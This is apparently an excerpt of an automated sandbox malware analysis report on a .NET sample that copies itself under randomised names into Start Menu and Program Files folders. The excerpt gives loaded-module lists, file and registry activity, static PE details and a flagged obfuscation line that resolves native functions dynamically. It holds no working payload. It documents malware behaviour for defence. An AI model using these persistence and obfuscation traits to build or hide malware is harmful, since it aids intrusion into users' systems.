                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: slc.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: sppc.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ktmw32.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rasapi32.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rasman.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rtutils.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dlnashext.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wpdshext.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: edputil.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: netutils.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: slc.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: sppc.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ktmw32.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rasapi32.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rasman.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rtutils.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dlnashext.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wpdshext.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: edputil.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: netutils.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: slc.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: sppc.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                            Source: C:\Users\user\Desktop\teh76E2k50.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{289AF617-1CC3-42A6-926C-E6A863F0E3BA}\InProcServer32Jump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDirectory created: C:\Program Files\Windows Mail\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDirectory created: C:\Program Files\Windows Mail\81acb8af1bb493Jump to behavior
                            Source: teh76E2k50.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: teh76E2k50.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                            Source: teh76E2k50.exeStatic file information: File size 3923968 > 1048576
                            Source: teh76E2k50.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x3bd800
                            Source: teh76E2k50.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000020.00000002.2976138886.000000001B540000.00000004.00000020.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000038.00000002.3585076992.000000001B3B6000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: KZll\System.pdbYA source: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000002C.00000002.3345697219.000000001C023000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: em.pdb source: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000026.00000002.3058692219.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb source: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000020.00000002.2976138886.000000001B540000.00000004.00000020.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000038.00000002.3585076992.000000001B3B6000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: em.pdbpdbtem.pdb source: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000032.00000002.3503891840.000000001C100000.00000004.00000020.00020000.00000000.sdmp

                            Data Obfuscation

                            barindex
                            .NET source code contains method to dynamically call methods (often used by packers)
                            Source: teh76E2k50.exe, mD10jnSFKu6YL9mCDNG.cs.Net Code: Type.GetTypeFromHandle(VCjgu9UyprjgRVDyZ23.gZd2dHJFeEP(16777425)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(VCjgu9UyprjgRVDyZ23.gZd2dHJFeEP(16777246)),Type.GetTypeFromHandle(VCjgu9UyprjgRVDyZ23.gZd2dHJFeEP(16777260))})
                            Source: C:\Users\user\Desktop\teh76E2k50.exeCode function: 0_2_00007FF849157564 push ebx; iretd 0_2_00007FF84915756A
                            Source: C:\Users\user\Desktop\teh76E2k50.exeCode function: 0_2_00007FF849158169 push ebx; ret 0_2_00007FF84915816A
                            Source: C:\Users\user\Desktop\teh76E2k50.exeCode function: 0_2_00007FF84915782F pushad ; iretd 0_2_00007FF84915785D
                            Source: C:\Users\user\Desktop\teh76E2k50.exeCode function: 0_2_00007FF849157C2F pushad ; retf 0_2_00007FF849157C5D
                            Source: C:\Users\user\Desktop\teh76E2k50.exeCode function: 0_2_00007FF84915785F push eax; iretd 0_2_00007FF84915786D
                            Source: C:\Users\user\Desktop\teh76E2k50.exeCode function: 0_2_00007FF849157C5F push eax; retf 0_2_00007FF849157C6D
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 7_2_00007FF848AA5921 push ds; retf 7_2_00007FF848AA596F
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 7_2_00007FF848A76DAC push eax; iretd 7_2_00007FF848A76DAE
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 7_2_00007FF848A76D9F push eax; iretd 7_2_00007FF848A76DA0
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 7_2_00007FF848A74531 pushad ; iretd 7_2_00007FF848A74533
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 7_2_00007FF848A74524 pushad ; iretd 7_2_00007FF848A74525
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 7_2_00007FF848A742A0 pushfd ; retn 0000h7_2_00007FF848A742A1
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 7_2_00007FF849391E17 push es; ret 7_2_00007FF849391E18
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 14_2_00007FF848A100BD pushad ; iretd 14_2_00007FF848A100C1
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 14_2_00007FF849118169 push ebx; ret 14_2_00007FF84911816A
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 14_2_00007FF849117C2F pushad ; retf 14_2_00007FF849117C5D
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 14_2_00007FF849117C5F push eax; retf 14_2_00007FF849117C6D
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 14_2_00007FF849117564 push ebx; iretd 14_2_00007FF84911756A
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 14_2_00007FF84911782F pushad ; iretd 14_2_00007FF84911785D
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 14_2_00007FF84911785F push eax; iretd 14_2_00007FF84911786D
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 20_2_00007FF848A300BD pushad ; iretd 20_2_00007FF848A300C1
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 20_2_00007FF849137564 push ebx; iretd 20_2_00007FF84913756A
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 20_2_00007FF849138169 push ebx; ret 20_2_00007FF84913816A
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 20_2_00007FF84913782F pushad ; iretd 20_2_00007FF84913785D
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 20_2_00007FF849137C2F pushad ; retf 20_2_00007FF849137C5D
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 20_2_00007FF84913785F push eax; iretd 20_2_00007FF84913786D
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 20_2_00007FF849137C5F push eax; retf 20_2_00007FF849137C6D
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 26_2_00007FF848A200BD pushad ; iretd 26_2_00007FF848A200C1
